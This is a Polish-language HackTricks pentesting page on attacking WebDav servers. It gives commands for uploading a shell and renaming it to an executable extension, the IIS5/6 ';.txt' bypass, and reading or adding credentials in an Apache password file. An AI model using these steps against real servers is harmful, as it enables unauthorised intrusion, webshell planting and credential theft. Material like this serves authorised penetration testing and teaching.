WebDav

Użyj Trickest, aby łatwo tworzyć i automatyzować przepływy pracy z wykorzystaniem najbardziej zaawansowanych narzędzi społecznościowych na świecie. Otrzymaj dostęp już dziś:

Zacznij od zera i zostań mistrzem hakowania AWS dzięki htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Podczas pracy z serwerem HTTP z włączonym WebDav, możliwe jest manipulowanie plikami, jeśli masz odpowiednie poświadczenia, zazwyczaj weryfikowane za pomocą HTTP Basic Authentication. Przejęcie kontroli nad takim serwerem często wiąże się z wgrywaniem i uruchamianiem webshell.

Dostęp do serwera WebDav zazwyczaj wymaga ważnych poświadczeń, a bruteforce WebDav jest powszechną metodą ich pozyskania.

Aby przezwyciężyć ograniczenia dotyczące wgrywania plików, zwłaszcza te uniemożliwiające wykonanie skryptów po stronie serwera, możesz:

  • Wgrać pliki z rozszerzeniami wykonywalnymi bezpośrednio, jeśli nie są ograniczone.

  • Zmienić nazwę wgranych plików niebędących wykonywalnymi (np. .txt) na rozszerzenie wykonywalne.

  • Skopiować wgrane pliki niebędące wykonywalnymi, zmieniając ich rozszerzenie na takie, które jest wykonywalne.

DavTest

Davtest próbuje wgrać kilka plików z różnymi rozszerzeniami i sprawdza, czy rozszerzenie jest wykonywane:

davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension

Cadaver

Możesz użyć tego narzędzia do połączenia z serwerem WebDav i wykonywania czynności (takich jak przesyłanie, przenoszenie lub usuwanie) ręcznie.

cadaver <IP>

Zapytanie PUT

curl -T 'shell.txt' 'http://$ip'

Żądanie MOVE

curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'

Użyj Trickest, aby łatwo tworzyć i automatyzować zadania przy użyciu najbardziej zaawansowanych narzędzi społeczności. Otrzymaj dostęp już dziś:

Podatność na WebDav w IIS5/6

Ta podatność jest bardzo interesująca. WebDav nie pozwala na przesyłanie ani zmianę nazwy plików z rozszerzeniem .asp. Jednak można to obejść, dodając na końcu nazwy ";.txt", a plik będzie wykonywany jak plik .asp (można również użyć ".html" zamiast ".txt", ale NIE zapomnij o ";").

Następnie możesz przesłać swoją powłokę jako plik ".txt" i skopiować/przenieść go do pliku ".asp;.txt". Po dostępie do tego pliku przez serwer WWW, zostanie wykonany (cadaver powie, że akcja przeniesienia nie powiodła się, ale tak naprawdę się udała).

Dane uwierzytelniające po

Jeśli Webdav korzystał z serwera Apache, powinieneś sprawdzić skonfigurowane witryny w Apache. Zazwyczaj: /etc/apache2/sites-enabled/000-default

Wewnątrz możesz znaleźć coś w rodzaju:

ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
DAV On
AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user

Jak widać, są pliki z ważnymi dane uwierzytelniające do serwera webdav:

/etc/apache2/users.password

Wewnątrz tego rodzaju plików znajdziesz nazwę użytkownika i skrót hasła. Są to dane uwierzytelniające, których serwer webdav używa do uwierzytelniania użytkowników.

Możesz spróbować je złamać, lub dodać więcej, jeśli z jakiegoś powodu chcesz uzyskać dostęp do serwera webdav:

htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password

Aby sprawdzić, czy nowe dane uwierzytelniające działają, możesz wykonać:

wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q

Odnośniki

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Użyj Trickest, aby łatwo tworzyć i automatyzować przepływy pracy zasilane przez najbardziej zaawansowane narzędzia społecznościowe na świecie. Otrzymaj dostęp już dziś:

Last updated